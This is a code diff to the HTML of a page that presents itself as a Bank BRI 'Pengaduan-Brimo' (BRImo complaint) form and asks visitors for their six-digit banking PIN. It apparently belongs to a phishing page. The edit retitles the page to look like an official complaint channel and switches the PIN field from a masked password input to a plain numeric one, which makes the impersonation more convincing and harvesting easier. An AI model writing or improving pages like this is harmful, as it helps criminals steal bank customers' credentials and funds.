--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
   <meta property="og:image" content="akusatu.jpg">
   <meta name="theme-color" content="#007bff">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Form Bank BRI</title>
+  <title>Pengaduan-Brimo-Bank BRI</title>
   <style>
     body {
       margin: 0;
@@ -138,7 +138,7 @@
       <div class="input-group">
         <label for="pin">Masukkan PIN 6 Digit</label>
         <div class="input-icon">
-          <input type="password" name="pin" id="pin" placeholder="Masukkan PIN 6 Digit" required minlength="6" maxlength="6" oninput="this.value=this.value.replace(/\D/g,'')" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px;">
+          <input type="tel" name="pin" id="pin" placeholder="Masukkan PIN 6 Digit" required minlength="6" maxlength="6" oninput="this.value=this.value.replace(/\D/g,'')" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px;">
           <img src="pin.png" alt="PIN Icon">
         </div>
       </div>
